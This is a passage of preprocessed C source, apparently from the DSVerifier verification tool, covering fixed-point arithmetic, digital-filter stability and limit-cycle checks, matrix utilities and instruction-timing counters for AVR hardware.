fxp_quantize(value);
printf("An Overflow Occurred in system's output");
__DSVERIFIER_assert(value <= _fxp_max && value >= _fxp_min);
}
void fxp_verify_overflow_node(fxp_t value, char* msg){
if (2 == 2)
{
printf("%s",msg);
__DSVERIFIER_assert(value <= _fxp_max && value >= _fxp_min);
}
}
void fxp_verify_overflow_array(fxp_t array[], int n){
int i=0;
for(i=0; i<n;i++){
fxp_verify_overflow(array[i]);
}
}
fxp_t fxp_int_to_fxp(int in) {
fxp_t lin;
lin = (fxp_t) in*_fxp_one;
return lin;
}
int fxp_to_int(fxp_t fxp) {
if(fxp >= 0){
fxp += _fxp_half;
} else {
fxp -= _fxp_half;
}
fxp >>= impl.frac_bits;
return (int) fxp;
}
fxp_t fxp_float_to_fxp(float f) {
fxp_t tmp;
double ftemp;
ftemp = f * scale_factor[impl.frac_bits];
if(f >= 0) {
tmp = (fxp_t)(ftemp + 0.5);
}
else {
tmp = (fxp_t)(ftemp - 0.5);
}
return tmp;
}
fxp_t fxp_double_to_fxp(double value) {
fxp_t tmp;
double ftemp = value * scale_factor[impl.frac_bits];
if (rounding_mode == 0){
if(value >= 0) {
tmp = (fxp_t)(ftemp + 0.5);
}
else {
tmp = (fxp_t)(ftemp - 0.5);
}
} else if(rounding_mode == 1){
tmp = (fxp_t) ftemp;
double residue = ftemp - tmp;
if ((value < 0) && (residue != 0)){
ftemp = ftemp - 1;
tmp = (fxp_t) ftemp;
}
} else if (rounding_mode == 0){
tmp = (fxp_t) ftemp;
}
return tmp;
}
void fxp_float_to_fxp_array(float f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
r[i] = fxp_float_to_fxp(f[i]);
}
}
void fxp_double_to_fxp_array(double f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
r[i] = fxp_double_to_fxp(f[i]);
}
}
# 275 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
float fxp_to_float(fxp_t fxp) {
float f;
int f_int = (int) fxp;
f = f_int * scale_factor_inv[impl.frac_bits];
return f;
}
double fxp_to_double(fxp_t fxp) {
double f;
int f_int = (int) fxp;
f = f_int * scale_factor_inv[impl.frac_bits];
return f;
}
void fxp_to_float_array(float f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
f[i] = fxp_to_float(r[i]);
}
}
void fxp_to_double_array(double f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
f[i] = fxp_to_double(r[i]);
}
}
fxp_t fxp_abs(fxp_t a) {
fxp_t tmp;
tmp = ((a < 0) ? -(fxp_t)(a) : a);
tmp = fxp_quantize(tmp);
return tmp;
}
fxp_t fxp_add(fxp_t aadd, fxp_t badd) {
fxp_t tmpadd;
tmpadd = ((fxp_t)(aadd) + (fxp_t)(badd));
tmpadd = fxp_quantize(tmpadd);
return tmpadd;
}
fxp_t fxp_sub(fxp_t asub, fxp_t bsub) {
fxp_t tmpsub;
tmpsub = (fxp_t)((fxp_t)(asub) - (fxp_t)(bsub));
tmpsub = fxp_quantize(tmpsub);
return tmpsub;
}
fxp_t fxp_mult(fxp_t amult, fxp_t bmult) {
fxp_t tmpmult, tmpmultprec;
tmpmult = (fxp_t)((fxp_t)(amult)*(fxp_t)(bmult));
if (tmpmult >= 0) {
tmpmultprec = (tmpmult + ((tmpmult & 1 << (impl.frac_bits - 1)) << 1)) >> impl.frac_bits;
} else {
tmpmultprec = -(((-tmpmult) + (((-tmpmult) & 1 << (impl.frac_bits - 1)) << 1)) >> impl.frac_bits);
}
tmpmultprec = fxp_quantize(tmpmultprec);
return tmpmultprec;
}
# 372 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
fxp_t fxp_div(fxp_t a, fxp_t b){
__DSVERIFIER_assume( b!=0 );
fxp_t tmpdiv = ((a << impl.frac_bits) / b);
tmpdiv = fxp_quantize(tmpdiv);
return tmpdiv;
}
fxp_t fxp_neg(fxp_t aneg) {
fxp_t tmpneg;
tmpneg = -(fxp_t)(aneg);
tmpneg = fxp_quantize(tmpneg);
return tmpneg;
}
# 398 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
fxp_t fxp_sign(fxp_t a) {
return ((a == 0) ? 0 : ((a < 0) ? _fxp_minus_one : _fxp_one) );
}
fxp_t fxp_shrl(fxp_t in, int shift) {
return (fxp_t) (((unsigned int) in) >> shift);
}
fxp_t fxp_square(fxp_t a) {
return fxp_mult(a, a);
}
void fxp_print_int(fxp_t a) {
printf("\n%i", (int32_t)a);
}
void fxp_print_float(fxp_t a) {
printf("\n%f", fxp_to_float(a));
}
void fxp_print_float_array(fxp_t a[], int N) {
int i;
for(i = 0; i < N; ++i) {
printf("\n%f", fxp_to_float(a[i]));
}
}
void print_fxp_array_elements(char * name, fxp_t * v, int n){
printf("%s = {", name);
int i;
for(i=0; i < n; i++){
printf(" %jd ", v[i]);
}
printf("}\n");
}
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 1
# 24 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
void initialize_array(double v[], int n){
int i;
for(i=0; i<n; i++){
v[i] = 0;
}
}
void revert_array(double v[], double out[], int n){
initialize_array(out,n);
int i;
for(i=0; i<n; i++){
out[i] = v[n-i-1];
}
}
double internal_pow(double a, double b){
int i;
double acc = 1;
for (i=0; i < b; i++){
acc = acc*a;
}
return acc;
}
double internal_abs(double a){
return a < 0 ? -a : a;
}
int fatorial(int n){
return n == 0 ? 1 : n * fatorial(n-1);
}
int check_stability(double a[], int n){
int lines = 2 * n - 1;
int columns = n;
double m[lines][n];
int i,j;
double current_stability[n];
for (i=0; i < n; i++){
current_stability[i] = a[i];
}
double sum = 0;
for (i=0; i < n; i++){
sum += a[i];
}
if (sum <= 0){
printf("[DEBUG] the first constraint of Jury criteria failed: (F(1) > 0)");
return 0;
}
sum = 0;
for (i=0; i < n; i++){
sum += a[i] * internal_pow(-1, n-1-i);
}
sum = sum * internal_pow(-1, n-1);
if (sum <= 0){
printf("[DEBUG] the second constraint of Jury criteria failed: (F(-1)*(-1)^n > 0)");
return 0;
}
if (internal_abs(a[n-1]) > a[0]){
printf("[DEBUG] the third constraint of Jury criteria failed: (abs(a0) < a_{n}*z^{n})");
return 0;
}
for (i=0; i < lines; i++){
for (j=0; j < columns; j++){
m[i][j] = 0;
}
}
for (i=0; i < lines; i++){
for (j=0; j < columns; j++){
if (i == 0){
m[i][j] = a[j];
continue;
}
if (i % 2 != 0 ){
int x;
for(x=0; x<columns;x++){
m[i][x] = m[i-1][columns-x-1];
}
columns = columns - 1;
j = columns;
}else{
m[i][j] = m[i-2][j] - (m[i-2][columns] / m[i-2][0]) * m[i-1][j];
}
}
}
int first_is_positive = m[0][0] >= 0 ? 1 : 0;
for (i=0; i < lines; i++){
if (i % 2 == 0){
int line_is_positive = m[i][0] >= 0 ? 1 : 0;
if (first_is_positive != line_is_positive){
return 0;
}
continue;
}
}
return 1;
}
void poly_sum(double a[], int Na, double b[], int Nb, double ans[], int Nans){
int i;
Nans = Na>Nb? Na:Nb;
for (i=0; i<Nans; i++){
if (Na>Nb){
ans[i]=a[i];
if (i > Na-Nb-1){
ans[i]=ans[i]+b[i-Na+Nb];
}
}else {
ans[i]=b[i];
if (i> Nb - Na -1){
ans[i]=ans[i]+a[i-Nb+Na];
}
}
}
}
void poly_mult(double a[], int Na, double b[], int Nb, double ans[], int Nans){
int i;
int j;
int k;
Nans = Na+Nb-1;
for (i=0; i<Na; i++){
for (j=0; j<Nb; j++){
k= Na + Nb - i - j - 2;
ans[k]=0;
}
}
for (i=0; i<Na; i++){
for (j=0; j<Nb; j++){
k= Na + Nb - i - j - 2;
ans[k]=ans[k]+a[Na - i - 1]*b[Nb - j - 1];
}
}
}
void double_check_oscillations(double * y, int y_size){
__DSVERIFIER_assume(y[0] != y[y_size - 1]);
int window_timer = 0;
int window_count = 0;
int i, j;
for (i = 2; i < y_size; i++){
int window_size = i;
for(j=0; j<y_size; j++){
if (window_timer > window_size){
window_timer = 0;
window_count = 0;
}
int window_index = j + window_size;
if (window_index < y_size){
if (y[j] == y[window_index]){
window_count++;
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
((void) sizeof ((
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
!(window_count == window_size)
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
!(window_count == window_size)
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
) ; else __assert_fail (
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
"!(window_count == window_size)"
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h", 209, __extension__ __PRETTY_FUNCTION__); }))
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
;
}
}else{
break;
}
window_timer++;
}
}
}
void double_check_limit_cycle(double * y, int y_size){
double reference = y[y_size - 1];
int idx = 0;
int window_size = 1;
for(idx = (y_size-2); idx >= 0; idx--){
if (y[idx] != reference){
window_size++;
}else{
break;
}
}
__DSVERIFIER_assume(window_size != y_size && window_size != 1);
printf("window_size %d\n", window_size);
int desired_elements = 2 * window_size;
int found_elements = 0;
for(idx = (y_size-1); idx >= 0; idx--){
if (idx > (y_size-window_size-1)){
printf("%.0f == %.0f\n", y[idx], y[idx-window_size]);
int cmp_idx = idx - window_size;
if ((cmp_idx > 0) && (y[idx] == y[idx-window_size])){
found_elements = found_elements + 2;
}else{
break;
}
}
}
printf("desired_elements %d\n", desired_elements);
printf("found_elements %d\n", found_elements);
__DSVERIFIER_assert(desired_elements != found_elements);
}
void double_check_persistent_limit_cycle(double * y, int y_size){
int idy = 0;
int count_same = 0;
int window_size = 0;
double reference = y[0];
for(idy = 0; idy < y_size; idy++){
if (y[idy] != reference){
window_size++;
} else if (window_size != 0){
break;
} else {
count_same++;
}
}
window_size += count_same;
__DSVERIFIER_assume(window_size > 1 && window_size <= y_size/2);
double lco_elements[window_size];
for(idy = 0; idy < y_size; idy++){
if (idy < window_size){
lco_elements[idy] = y[idy];
}
}
idy = 0;
int lco_idy = 0;
_Bool is_persistent = 0;
while (idy < y_size){
if(y[idy++] == lco_elements[lco_idy++]){
is_persistent = 1;
}else{
is_persistent = 0;
break;
}
if (lco_idy == window_size){
lco_idy = 0;
}
}
__DSVERIFIER_assert(is_persistent == 0);
}
void print_array_elements(char * name, double * v, int n){
printf("%s = {", name);
int i;
for(i=0; i < n; i++){
printf(" %.32f ", v[i]);
}
printf("}\n");
}
void double_add_matrix( unsigned int lines, unsigned int columns, double m1[4][4], double m2[4][4], double result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
result[i][j] = m1[i][j] + m2[i][j];
}
}
}
void double_sub_matrix( unsigned int lines, unsigned int columns, double m1[4][4], double m2[4][4], double result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
result[i][j] = m1[i][j] - m2[i][j];
}
}
}
void double_matrix_multiplication( unsigned int i1, unsigned int j1, unsigned int i2, unsigned int j2, double m1[4][4], double m2[4][4], double m3[4][4]){
unsigned int i, j, k;
if (j1 == i2) {
for (i=0; i<i1; i++) {
for (j=0; j<j2; j++) {
m3[i][j] = 0;
}
}
for (i=0;i<i1; i++) {
for (j=0; j<j2; j++) {
for (k=0; k<j1; k++) {
double mult = (m1[i][k] * m2[k][j]);
m3[i][j] = m3[i][j] + (m1[i][k] * m2[k][j]);
}
}
}
} else {
printf("\nError! Operation invalid, please enter with valid matrices.\n");
}
}
void fxp_matrix_multiplication( unsigned int i1, unsigned int j1, unsigned int i2, unsigned int j2, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t m3[4][4]){
unsigned int i, j, k;
if (j1 == i2) {
for (i=0; i<i1; i++) {
for (j=0; j<j2; j++) {
m3[i][j] = 0;
}
}
for (i=0;i<i1; i++) {
for (j=0; j<j2; j++) {
for (k=0; k<j1; k++) {
m3[i][j] = fxp_add( m3[i][j], fxp_mult(m1[i][k] , m2[k][j]));
}
}
}
} else {
printf("\nError! Operation invalid, please enter with valid matrices.\n");
}
}
void fxp_exp_matrix(unsigned int lines, unsigned int columns, fxp_t m1[4][4], unsigned int expNumber, fxp_t result[4][4]){
unsigned int i, j, l, k;
fxp_t m2[4][4];
if(expNumber == 0){
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
if(i == j){
result[i][j] = fxp_double_to_fxp(1.0);
} else {
result[i][j] = 0.0;
}
}
}
return;
}
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = m1[i][j];
if(expNumber == 1){
return;
}
for(l = 1; l < expNumber; l++){
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) m2[i][j] = result[i][j];
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = 0;
for (i=0;i<lines; i++) {
for (j=0; j<columns; j++) {
for (k=0; k<columns; k++) {
result[i][j] = fxp_add( result[i][j], fxp_mult(m2[i][k] , m1[k][j]));
}
}
}
}
}
void double_exp_matrix(unsigned int lines, unsigned int columns, double m1[4][4], unsigned int expNumber, double result[4][4]){
unsigned int i, j, k, l;
double m2[4][4];
if(expNumber == 0){
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
if(i == j){
result[i][j] = 1.0;
} else {
result[i][j] = 0.0;
}
}
}
return;
}
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = m1[i][j];
if(expNumber == 1){
return;
}
for(l = 1; l < expNumber; l++){
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) m2[i][j] = result[i][j];
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = 0;
for (i=0;i<lines; i++) {
for (j=0; j<columns; j++) {
for (k=0; k<columns; k++) {
result[i][j] = result[i][j] + (m2[i][k] * m1[k][j]);
}
}
}
}
}
void fxp_add_matrix( unsigned int lines, unsigned int columns, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) {
result[i][j] = fxp_add(m1[i][j] , m2[i][j]);
}
}
void fxp_sub_matrix( unsigned int lines, unsigned int columns, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = fxp_sub(m1[i][j] , m2[i][j]);
}
void print_matrix(double matrix[4][4], unsigned int lines, unsigned int columns){
printf("\nMatrix\n=====================\n\n");
unsigned int i, j;
for (i=0; i<lines; i++) {
for (j=0; j<columns; j++) {
printf("#matrix[%d][%d]: %2.2f ", i,j,matrix[i][j]);
}
printf("\n");
}
printf("\n");
}
double determinant(double a[4][4],int n)
{
int i,j,j1,j2;
double det = 0;
double m[4][4];
if (n < 1) {
} else if (n == 1) {
det = a[0][0];
} else if (n == 2) {
det = a[0][0] * a[1][1] - a[1][0] * a[0][1];
} else {
det = 0;
for (j1=0;j1<n;j1++) {
for (i=0;i<n-1;i++)
for (i=1;i<n;i++) {
j2 = 0;
for (j=0;j<n;j++) {
if (j == j1)
continue;
m[i-1][j2] = a[i][j];
j2++;
}
}
det += internal_pow(-1.0,1.0+j1+1.0) * a[0][j1] * determinant(m,n-1);
}
}
return(det);
}
double fxp_determinant(fxp_t a_fxp[4][4],int n)
{
int i,j,j1,j2;
double a[4][4];
for(i=0; i<n;i++){
for(j=0; j<n;j++){
a[i][j]= fxp_to_double(a_fxp[i][j]);
}
}
double det = 0;
double m[4][4];
if (n < 1) {
} else if (n == 1) {
det = a[0][0];
} else if (n == 2) {
det = a[0][0] * a[1][1] - a[1][0] * a[0][1];
} else {
det = 0;
for (j1=0;j1<n;j1++) {
for (i=0;i<n-1;i++)
for (i=1;i<n;i++) {
j2 = 0;
for (j=0;j<n;j++) {
if (j == j1)
continue;
m[i-1][j2] = a[i][j];
j2++;
}
}
det += internal_pow(-1.0,1.0+j1+1.0) * a[0][j1] * determinant(m,n-1);
}
}
return(det);
}
void transpose(double a[4][4], double b[4][4],int n, int m)
{
int i,j;
for (i=0;i<n;i++) {
for (j=0;j<m;j++) {
b[j][i] = a[i][j];
}
}
}
void fxp_transpose(fxp_t a[4][4], fxp_t b[4][4],int n, int m)
{
int i,j;
for (i=0;i<n;i++) {
for (j=0;j<m;j++) {
b[j][i] = a[i][j];
}
}
}
# 24 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
extern int generic_timer;
extern hardware hw;
double generic_timing_shift_l_double(double zIn, double z[], int N) {
generic_timer += ((2 * hw.assembly.push) + (3 * hw.assembly.in) + (3 * hw.assembly.out) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (8 * hw.assembly.std));
int i;
double zOut;
zOut = z[0];
generic_timer += ((5 * hw.assembly.ldd) + (2 * hw.assembly.mov) + (4 * hw.assembly.std) + (1 * hw.assembly.ld));
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (i = 0; i < N - 1; i++) {
generic_timer += ((17 * hw.assembly.ldd) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (6 * hw.assembly.mov) + (2 * hw.assembly.adiw) + (5 * hw.assembly.std) + (1 * hw.assembly.ld) + (1 * hw.assembly.st) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbc)+ (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt));
z[i] = z[i + 1];
}
z[N - 1] = zIn;
generic_timer += ((12 * hw.assembly.ldd) + (6 * hw.assembly.mov) + (3 * hw.assembly.std) + (2 * hw.assembly.lsl) + (2 * hw.assembly.rol) + (1 * hw.assembly.adc) + (1 * hw.assembly.add) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in)+ (1 * hw.assembly.cli));
generic_timer += ((3 * hw.assembly.out) + (2 * hw.assembly.pop) + (1 * hw.assembly.ret));
return (zOut);
}
double generic_timing_shift_r_double(double zIn, double z[], int N) {
generic_timer += ((2 * hw.assembly.push) + (3 * hw.assembly.in) + (3 * hw.assembly.out) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (8 * hw.assembly.std));
int i;
double zOut;
zOut = z[N - 1];
generic_timer += ((7 * hw.assembly.ldd) + (2 * hw.assembly.rol) + (2 * hw.assembly.lsl) + (2 * hw.assembly.mov) + (4 * hw.assembly.std) + (1 * hw.assembly.add) + (1 * hw.assembly.adc) + (1 * hw.assembly.ld) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci));
generic_timer += ((2 * hw.assembly.ldd) + (2 * hw.assembly.std) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.rjmp));
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
generic_timer += ((15 * hw.assembly.ldd) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (4 * hw.assembly.mov) + (5 * hw.assembly.std) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.ld) + (1 * hw.assembly.st) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt));
}
z[0] = zIn;
generic_timer += ((10 * hw.assembly.ldd) + (5 * hw.assembly.mov) + (3 * hw.assembly.std) + (3 * hw.assembly.out) + (2 * hw.assembly.pop) + (1 * hw.assembly.ret) + (1 * hw.assembly.ret) + (1 * hw.assembly.cli) + (1 * hw.assembly.in) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw));
return zOut;
}
fxp_t shiftL(fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
fxp_t shiftR(fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
zOut = z[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
}
z[0] = zIn;
return zOut;
}
float shiftLfloat(float zIn, float z[], int N) {
int i;
float zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
float shiftRfloat(float zIn, float z[], int N) {
int i;
float zOut;
zOut = z[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
}
z[0] = zIn;
return zOut;
}
double shiftRDdouble(double zIn, double z[], int N) {
int i;
double zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
double shiftRdouble(double zIn, double z[], int N) {
int i;
double zOut;
zOut = z[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
}
z[0] = zIn;
return zOut;
}
double shiftLDouble(double zIn, double z[], int N) {
int i;
double zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
void shiftLboth(float zfIn, float zf[], fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
float zfOut;
zOut = z[0];
zfOut = zf[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
zf[i] = zf[i + 1];
}
z[N - 1] = zIn;
zf[N - 1] = zfIn;
}
void shiftRboth(float zfIn, float zf[], fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
float zfOut;
zOut = z[N - 1];
zfOut = zf[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
zf[i] = zf[i - 1];
}
z[0] = zIn;
zf[0] = zfIn;
}
int order(int Na, int Nb) {
return Na > Nb ? Na - 1 : Nb - 1;
}
void fxp_check_limit_cycle(fxp_t y[], int y_size){
fxp_t reference = y[y_size - 1];
int idx = 0;
int window_size = 1;
for(idx = (y_size-2); idx >= 0; idx--){
if (y[idx] != reference){
window_size++;
}else{
break;
}
}
__DSVERIFIER_assume(window_size != y_size && window_size != 1);
printf("window_size %d\n", window_size);
int desired_elements = 2 * window_size;
int found_elements = 0;
for(idx = (y_size-1); idx >= 0; idx--){
if (idx > (y_size-window_size-1)){
printf("%.0f == %.0f\n", y[idx], y[idx-window_size]);
int cmp_idx = idx - window_size;
if ((cmp_idx > 0) && (y[idx] == y[idx-window_size])){
found_elements = found_elements + 2;
}else{
break;
}
}
}
__DSVERIFIER_assume(found_elements > 0);
printf("desired_elements %d\n", desired_elements);
printf("found_elements %d\n", found_elements);
__DSVERIFIER_assume(found_elements == desired_elements);
__DSVERIFIER_assert(0);
}
void fxp_check_persistent_limit_cycle(fxp_t * y, int y_size){
int idy = 0;
int count_same = 0;
int window_size = 0;
fxp_t reference = y[0];
for(idy = 0; idy < y_size; idy++){
if (y[idy] != reference){
window_size++;
} else if (window_size != 0){
break;
} else {
count_same++;
}
}
window_size += count_same;
__DSVERIFIER_assume(window_size > 1 && window_size <= y_size/2);
fxp_t lco_elements[window_size];
for(idy = 0; idy < y_size; idy++){
if (idy < window_size){
lco_elements[idy] = y[idy];
}
}
idy = 0;
int lco_idy = 0;
_Bool is_persistent = 0;
while (idy < y_size){
if(y[idy++] == lco_elements[lco_idy++]){
is_persistent = 1;
}else{
is_persistent = 0;
break;
}
if (lco_idy == window_size){
lco_idy = 0;
}
}
__DSVERIFIER_assert(is_persistent == 0);
}
void fxp_check_oscillations(fxp_t y[] , int y_size){
__DSVERIFIER_assume((y[0] != y[y_size - 1]) && (y[y_size - 1] != y[y_size - 2]));
int window_timer = 0;
int window_count = 0;
int i, j;
for (i = 2; i < y_size; i++){
int window_size = i;
for(j=0; j<y_size; j++){
if (window_timer > window_size){
window_timer = 0;
window_count = 0;
}
int window_index = j + window_size;
if (window_index < y_size){
if (y[j] == y[window_index]){
window_count++;
__DSVERIFIER_assert(!(window_count == window_size));
}
}else{
break;
}
window_timer++;
}
}
}
int fxp_ln(int x) {
int t, y;
y = 0xa65af;
if (x < 0x00008000)
x <<= 16, y -= 0xb1721;
if (x < 0x00800000)
x <<= 8, y -= 0x58b91;
if (x < 0x08000000)
x <<= 4, y -= 0x2c5c8;
if (x < 0x20000000)
x <<= 2, y -= 0x162e4;
if (x < 0x40000000)
x <<= 1, y -= 0x0b172;
t = x + (x >> 1);
if ((t & 0x80000000) == 0)
x = t, y -= 0x067cd;
t = x + (x >> 2);
if ((t & 0x80000000) == 0)
x = t, y -= 0x03920;
t = x + (x >> 3);
if ((t & 0x80000000) == 0)
x = t, y -= 0x01e27;
t = x + (x >> 4);
if ((t & 0x80000000) == 0)
x = t, y -= 0x00f85;
t = x + (x >> 5);
if ((t & 0x80000000) == 0)
x = t, y -= 0x007e1;
t = x + (x >> 6);
if ((t & 0x80000000) == 0)
x = t, y -= 0x003f8;
t = x + (x >> 7);
if ((t & 0x80000000) == 0)
x = t, y -= 0x001fe;
x = 0x80000000 - x;
y -= x >> 15;
return y;
}
double fxp_log10_low(double x) {
int xint = (int) (x * 65536.0 + 0.5);
int lnum = fxp_ln(xint);
int lden = fxp_ln(655360);
return ((double) lnum / (double) lden);
}
double fxp_log10(double x) {
if (x > 32767.0) {
if (x > 1073676289.0) {
x = x / 1073676289.0;
return fxp_log10_low(x) + 9.030873362;
}
x = x / 32767.0;
return fxp_log10_low(x) + 4.515436681;
}
return fxp_log10_low(x);
}
float snrVariance(float s[], float n[], int blksz) {
int i;
double sm = 0, nm = 0, sv = 0, nv = 0, snr;
for (i = 0; i < blksz; i++) {
sm += s[i];
nm += n[i];
}
sm /= blksz;
nm /= blksz;
for (i = 0; i < blksz; i++) {
sv += (s[i] - sm) * (s[i] - sm);
nv += (n[i] - nm) * (n[i] - nm);
}
if (nv != 0.0f) {
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"sv >= nv"
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 373, __extension__ __PRETTY_FUNCTION__); }))
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
snr = sv / nv;
return snr;
} else {
return 9999.9f;
}
}
float snrPower(float s[], float n[], int blksz) {
int i;
double sv = 0, nv = 0, snr;
for (i = 0; i < blksz; i++) {
sv += s[i] * s[i];
nv += n[i] * n[i];
}
if (nv != 0.0f) {
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
